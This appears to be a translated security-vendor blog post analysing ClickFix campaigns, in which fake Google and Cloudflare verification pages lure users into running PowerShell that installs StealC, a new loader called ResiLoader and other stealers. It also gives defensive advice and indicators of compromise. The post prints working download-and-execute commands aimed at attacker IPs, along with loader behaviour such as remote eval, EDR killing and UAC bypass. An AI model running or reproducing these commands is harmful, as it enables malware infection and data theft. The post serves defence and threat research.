Поддельные страницы подтверждения Google и Cloudflare распространяют несколько семейств вредоносных программ

| 2 июля 2026 года
Поддельные страницы подтверждения Google и Cloudflare распространяют несколько семейств вредоносных программ

Атаки типа ClickFix, в ходе которых пользователей обманом заставляют самостоятельно выполнять вредоносные команды, продолжают развиваться. В рамках этой последней кампании используются поддельные страницы подтверждения от Google и Cloudflare, чтобы убедить жертв заразить свои собственные устройства.

Одна-единственная ошибка может привести к установке вредоносного ПО, которое похищает пароли и другие конфиденциальные данные, предоставляет злоумышленникам удаленный доступ к вашему компьютеру или загружает дополнительное вредоносное ПО, способное полностью взять под контроль вашу систему.

Нам удалось выявить несколько кампаний, в которых для распространения вредоносного ПО использовалась одна и та же инфраструктура, в том числе HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport и программа-крадец на базе Rust.

В одной из цепочек заражения троянская версия легитимного мессенджера Franz загружает ранее не зафиксированный загрузчик под названием ResiLoader, который отключает средства защиты, а затем запускает программу-крадун StealC.

Прежде чем перейти к техническим деталям, давайте разберемся, как не стать следующей жертвой.

Как оставаться в безопасности

Атаки ClickFix основаны на том, чтобы убедить вас самостоятельно запустить команды. Самый безопасный подход прост:

  • Никогда не копируйте и не запускайте команды с веб-сайта, если только вы не следуете инструкциям из надежного источника и точно не понимаете, что делает данная команда.
  • Будьте осторожны с страницами проверки. Google, Cloudflare, Microsoft и другие легитимные сервисы никогда не будут просить вас вставлять команды PowerShell в Windows подтвердить, что вы человек, или устранить какую-либо проблему.
  • Не позволяйте срочности заставить вас поспешить. На поддельных страницах подтверждения часто используются таймеры обратного отсчёта, счетчики посетителей или предупреждения, чтобы подтолкнуть вас к быстрому принятию решения.
  • Обновляйте свое программное обеспечение для защиты. Защита в режиме реального времени и веб-защита помогут заблокировать вредоносные сайты, прежде чем вы перейдете на них.
  • Сомневайтесь в неожиданных технических инструкциях. Если на веб-сайте вам предлагают запустить PowerShell, командную строку или терминал, остановитесь и проверьте эти инструкции через официальные каналы поддержки компании.

Совет от профессионала: Malwarebytes Browser Guard может предупредить вас, когда веб-сайт пытается скопировать контент в ваш буфер обмена — это распространённый трюк, используемый страницами ClickFix.

Технический анализ

Кампании, проанализированные в рамках данного исследования, действуют, по крайней мере, с конца 2025 года и используют различные поддельные страницы Google и Cloudflare для распространения вредоносного ПО. Несмотря на различия в приманках, они в значительной степени используют одну и ту же инфраструктуру и цепочку заражения, при этом злоумышленники постоянно тестируют новые методы доставки и полезные нагрузки.

Разные приманки — одна цель

Большинство кампаний имеют ряд общих черт:

  • Использование папки C:\ProgramData\Zooms для извлечения последующих этапов
  • Команды PowerShell ClickFix, построенные по схожим шаблонам
  • Использование хранилищ Cloudflare R2 для доставки полезных данных
  • IP-адреса, обслуживаемые компанией ASN Dedik Services Limited
  • HTML-ответы, содержащие только эту фразу "hehe"

Эти показатели со временем менялись, поэтому они встречаются не во всех цепочках заражения. Кампании продолжают развиваться: регулярно появляются новые вредоносные нагрузки и способы их доставки. Например, в некоторых случаях для распространения вредоносной нагрузки вместо хранилищ используются непосредственно IP-адреса.

Последняя команда, скопированная пользователем, обычно соответствует следующему шаблону: 

powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”

В проанализированных случаях порт и путь не всегда указаны; порты выбираются случайным образом, однако среди используемых встречаются следующие: 6600, 9900, 5506, 7895, 7493, 149, 8442. 

Для выполнения этих команд используются несколько шаблонов, связанных с ClickFix, в основном относящихся к Google и Cloudflare. Мы также обнаружили, что в некоторых случаях команда PowerShell распространялась через фреймворк IClickFix. 

Мы заметили, что эти рекламные кампании ClickFix распространяются через:

  • Старые веб-сайты, срок действия которых, вероятно, истек и которые были выкуплены злоумышленником (злоумышленниками).  
  • CloudFlare Pages (.pages.dev домены). 
  • Сайты, подвергшиеся взлому. 
  • Поддельные сервисы, например, связанные с QR-кодами или доступом к файлам в Интернете. 

Рекламные объявления Google ClickFix 

Участники этих кампаний используют различные HTML-страницы и наборы инструментов, связанные с Google. 

Одна из уловок имитирует проверку Google reCAPTCHA. Страницы размещены на случайных URL-адресах, на которых отображается поддельный или вредоносный контент. Эти домены зачастую являются старыми регистрациями, которые недавно начали разрешаться на новые IP-адреса, что позволяет предположить, что они были перепрофилированы для проведения этой кампании.

На некоторых из этих страниц присутствуют такие параметры URL, как «zoneid», «cost», «device», «country», «clickid», например: 

  • /conf/captcha.html?zoneid=10420852 
  • /wincapbot/nobot.html 
  • /xmr/trkuste.php?zone=5327134 
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop 
Страница ClickFix «Требуется ручная проверка»
Страница ClickFix «Требуется ручная проверка»
Страница ClickFix «Требуется ручная проверка»

В данном случае функции, связанные с ClickFix, реализованы в классе CustomCaptcha. Команда представлена в открытом виде без какого-либо зашифрования. 

Метод «StartVerification» в классе «CustomCaptcha»
Метод «StartVerification» в классе «CustomCaptcha»

Еще один способ распространения предполагает использование Cloudflare Pages, размещенного на .pages.dev поддомены.

Страница ClickFix «Подтвердите, что вы человек»
Страница ClickFix «Подтвердите, что вы человек»

В данном случае HTML-страница подвергается обфускации путем объявления нескольких переменных и применения к ним операции XOR. Деобфускация кода называется SECURITY GATEWAY и состоит из следующих функций: GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, и PanelController.  

Этот код позволяет злоумышленникам извлекать команду как удаленно, так и локально. В данном примере вредоносная команда PowerShell хранится локально.

Команда PowerShell, объявленная в коде «SECURITY GATEWAY»
Команда PowerShell, объявленная в коде «SECURITY GATEWAY»

Мы также обнаружили, что некоторые из этих доменов ранее распространяли другую ловушку, в данном случае связанную с несанкционированным входом в аккаунт Google. Эта ловушка ClickFix предлагает пользователю скопировать и вставить вредоносную команду, чтобы установить своё устройство в качестве основного. 

Страница ClickFix «Новый вход с помощью доверенного токена»
Страница ClickFix «Новый вход с помощью доверенного токена»

Интересная особенность этого набора ClickFix заключается в том, что он оснащён «механизмом авторизации», как описано в комментариях, и что злоумышленник должен вручную выбрать на панели, какую команду необходимо заставить пользователя выполнить. 

Отзывы о наборе и «контрольном этапе»
Отзывы о наборе и «контрольном этапе»
Отзывы о наборе и «контрольном этапе»

В ходе недавних кампаний мы обнаружили приманку ClickFix, связанную с Google Meet, в которой пользователю предлагается скопировать и вставить вредоносную команду для устранения проблем со звуком. 

Приманка «Исправить драйвер звуковой карты» от Meet ClickFix
Ловушка «исправить драйвер звуковой карты» в Google Meet от ClickFix

В проанализированных случаях конечная точка /api/driver-clipboard.php вернула следующую вредоносную команду:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Другие приманки 

Участники этой кампании используют различные наборы инструментов и приманки, в основном связанные с Google. Однако мы обнаружили и другие приманки, в которых были скопированы команды, относящиеся к той же инфраструктуре. 

Злоумышленники, стоящие за этими кампаниями, также взламывают множество веб-сайтов, используя различные шаблоны, связанные с приманкой CloudFlare ClickFix

Страницы ClickFix с надписью «Подтвердите, что вы человек»
Страницы ClickFix с надписью «Подтвердите, что вы человек»
Страницы ClickFix с надписью «Подтвердите, что вы человек»

Мы обнаружили несколько шаблонов, используемых для страниц CloudFlare. В проанализированных случаях эта команда присутствует в открытом виде или, в некоторых случаях, в зашифрованном виде. 

Некоторые HTML-страницы CloudFlare ClickFix 
Некоторые HTML-страницы CloudFlare ClickFix 
Некоторые HTML-страницы CloudFlare ClickFix 
Некоторые HTML-страницы CloudFlare ClickFix 

Мы также обнаружили несколько специально созданных поддельных веб-сайтов, предлагающих различные услуги. Например, сайт «My QR Generator» отображает зашифрованный QR-код и просит пользователя запустить команду PowerShell, чтобы подтвердить, что он не робот. 

Страница с приманкой ClickFix «QR-код» 
Страница с приманкой ClickFix «QR-код» 

В данном случае команда закодирована в кодировке base-64: 

Расшифрованная команда PowerShell
Расшифрованная команда PowerShell

Программа для загрузки PowerShell 

Команда ClickFix, запущенная пользователем, декодирует скрипт и помещает его в папку Temp под именем tmp{4 char}.tmp.ps1

Нам удалось обнаружить несколько вариантов этого скрипта, однако последние версии выполняют следующие действия: 

  • Создать папку C:\ProgramData\Zooms
  • Загрузите следующий этап из хранилища CloudFlare и сохраните его в C:\ProgramData\Zooms. В некоторых вариантах скрипта следующий этап загружается напрямую с IP-адреса. 
  • Отправьте информацию о скомпрометированном компьютере по адресу http://{IP}/dl-callback. В некоторых вариантах сценария эта часть отсутствует. 
Скрипт PowerShell, который не запустился
Скрипт PowerShell, который не запустился

Злоумышленники, стоящие за этими кампаниями, используют большое количество различных полезных нагрузок. В рамках этих кампаний распространяется широкий спектр полезных нагрузок. В приведенной ниже таблице представлены названия некоторых загружаемых файлов и вредоносное ПО, которое они устанавливают. Во многих из проанализированных случаев конечная полезная нагрузка распространялась с помощью метода «DLL Hijacking», как мы также увидим позже на примере стелера StealC. 

Файл распространен Распространение вредоносного ПО 
libEGL.zip, Safe-1.zip Троянизированное приложение Electron, ResiLoader и StealC 
Test.msi Deno Loader и PowerShell Stealer 
arworks.zip Amatera Stealer 
water-night.zip Ремус Стилер 
Setup.msi, Invintrum_first.msi NetSupport 
traffic1.msi CastleLoader 
ibrowser.exe «Похититель ржавчины» 

Мы проанализировали новый загрузчик под названием ResiLoader, который в конечном итоге распространяет вредоносное ПО StealC. Кроме того, мы обнаружили, что в ходе последних кампаний злоумышленник начал использовать Deno для распространения разработанного на PowerShell стелера; анализ этой цепочки заражения может стать темой одного из будущих постов в блоге. 

Приложение Electron с троянским кодом загружает ResiLoader

В данном случае ZIP-файл был загружен с: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

После вывода в: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

Архив содержит троянскую версию приложения с открытым исходным кодом для обмена сообщениями под названием «Franz»: 

Троянизированное приложение «Franz», используемое для загрузки ResiLoader
Троянское приложение «Franz», используемое для загрузки ResiLoader

Вредоносный код реализован в index.js файл: 

Запутывающий код в приложении с бэкдором
Запутывающий код в приложении с бэкдором

Программа для загрузки выполняет следующие операции: 

  • Декодируйте строки с помощью функции HC()
  • Читает readme.txt, ожидает ключ кампании следующего вида: AAAA-BBBB, возвращает его в виде массива токенов. В данном случае имя — resiloader-1 и именно так мы называем загруженную DLL — «ResiLoader». 
  • Читает %APPDATA%\setup.txt; если этот параметр отсутствует, генерируется случайная строка длиной 8 символов и сохраняется.  
  • Обеспечение сохранности данных с помощью app.setLoginItemSettings
  • Отправляет запрос POST на https[:]//completstep[.]com/api/ и сформировать ответ в формате JSON
    • Если task.e если он присутствует, то выполняется eval(task.e); это позволяет злоумышленнику выполнить произвольный код JavaScript. 
    • Если task.files если есть, создать %TEMP%\<Date.now()>\, декодировать и записать каждый файл; если имя какого-либо файла заканчивается на .exe, запустите его через child_process.exec

В нашем случае мы получили ZIP-архив, который осуществляет перехват DLL-файла ssh-add.exe

{"task":{"name":"JUNE18USY","files":{ 

   "msys-2.0.dll":"<base64>", 

   "msys-crypto-3.dll":"<base64>", 

   "msys-gcc_s-seh-1.dll":"<base64>", 

   "ssh-add.exe":"<base64>" }}}

Затем исполняемый файл был запущен с помощью команды: 

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

Сайт msys-crypto-3.dll представляет собой зашифрованный .NET NativeAOT loader который обходит антивирусные программы и системы обнаружения угроз (AV/EDR) с помощью метода BYOD, обеспечивает постоянное присутствие в системе и в конечном итоге загружает программу-крадушку StealC. Мы не обнаружили конкретных данных, позволяющих установить авторство этого загрузчика, поэтому назвали его «ResiLoader» на основании строки, присутствовавшей в предыдущих readme.txt

Загрузчик содержит несколько строк: одни из них в открытом виде, а другие — в зашифрованном. После расшифровки этих строк можно составить полное представление о функциональных возможностях ResiLoader. 

MANPO: ReadModule len=... 

MANPO: magicOffset=...
… 

PERS: FAIL all file copies failed, skipping run key 

PERS: FAIL both HKLM and HKCU Run key writes failed 
… 

RUNPE: CreateProcess failed 

RUNPE: PEB patched 

RUNPE: VirtualAllocEx failed 
… 

POST: RunForever exited (unexpected) 

POST: entering RunForever 

POST: hollow=

Загрузчик выполняет следующие операции: 

  • Извлеките закодированный блок данных, содержащий два полезных нагрузки, считывая маркер AtLorenBase и длину закодированного блока данных. Затем он декодирует этот блок и расшифровывает драйвер pcdhost.sys (OPSWAT  
    (драйвер AppRemover) и полезную нагрузку StealC с помощью собственного алгоритма дешифрования.  
  • Завершите более 140 процессов, связанных с EDR/AV, с помощью удаленного драйвера. 
  • Обойти UAC с помощью ICMLuaUtil Расширенный интерфейс COM. 
  • Создать папку C:\ProgramData\Google Update, копируя себя; обеспечивая постоянное хранение с помощью ключа реестра RUN 
  • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe 

В итоге загрузчик выполняет «выемку» процесса ServiceModelReg.exe для запуска программы-крадец StealC. 

МНК 

Хеш 

72907d0ca3258365838626f6a8d993a6: DLL-файл ResiLoader 

0234E3188F2883A438B3F2BEAB7A78B2: StealC 

6a9ac6b3fff7b695dbd4df6ff7f6c516: Ремус 

206ce339febca0c3bcc850f42595fc63: Amatera Stealer 

eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT 

b8d53740024d126cb55f83854335a4ab: «Похититель ржавчины» 

Домены 

Распространение страниц ClickFix: 

onegeekworld[.]com 

thefirmos[.]com 

antibotv3[.]com 

centralwildcats[.]com 

cloud.antibotv3[.]com 

cloudautosolutions[.]com 

sunseekersupply[.]com 

123clocks[.]com 

orcanegames[.]com 

rwmonitoring[.]com 

100furniture[.]com 

nepalcharchaa[.]com 

p-floribunds.pages[.]dev 

pg-altirade2.pages[.]dev 

pg-cordivant-m6.pages[.]dev 

g-luminence.pages[.]dev 

generator-qrcode[.]online 

regdev-google[.]com 

khosla[.]capital 

eorgke09054909j[.]com 

dropboxi[.]com 

Контейнеры CloudFlare, используемые для распространения полезных данных

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-620528e2dc874e16937673265aa23d39.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev 

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev 

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev 

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev 

unitedstateverif[.]com: распределение полезной нагрузки 

bigflaredefence[.]com: распределение полезной нагрузки 

popularcard[.]shop: C2-сервер «Rust Stealer» 

xzz[.]proxygrid[.]cc: Amatera Stealer C2 

completstep[.]com: Загрузчик C2 

eventlogerps1[.]ink: Deno Loader  

be231ro963[.]com: Deno Loader  

IP-адреса 

IP-адрес, используемый для распространения полезных данных

151.240.151[.]126 

85.239.149[.]16 

85.239.149[.]40 

93.152.224[.]29 

151.240.151[.]46 

93.152.224[.]167 

85.239.149[.]78 

192.69.195[.]131 

135.181.171[.]40 

94.26.83[.]206 

91.92.34[.]128 

85.239.144[.]31 

93.152.224[.]39 

94.26.90[.]112 

146.19.248[.]120: StealC C2 

Благодарности  

Об авторе

Габриэле — инженер-исследователь в области вредоносного ПО, который обожает бороться с вредоносными программами. В свободное от работы время он любит наслаждаться природой, искусством и общением с животными.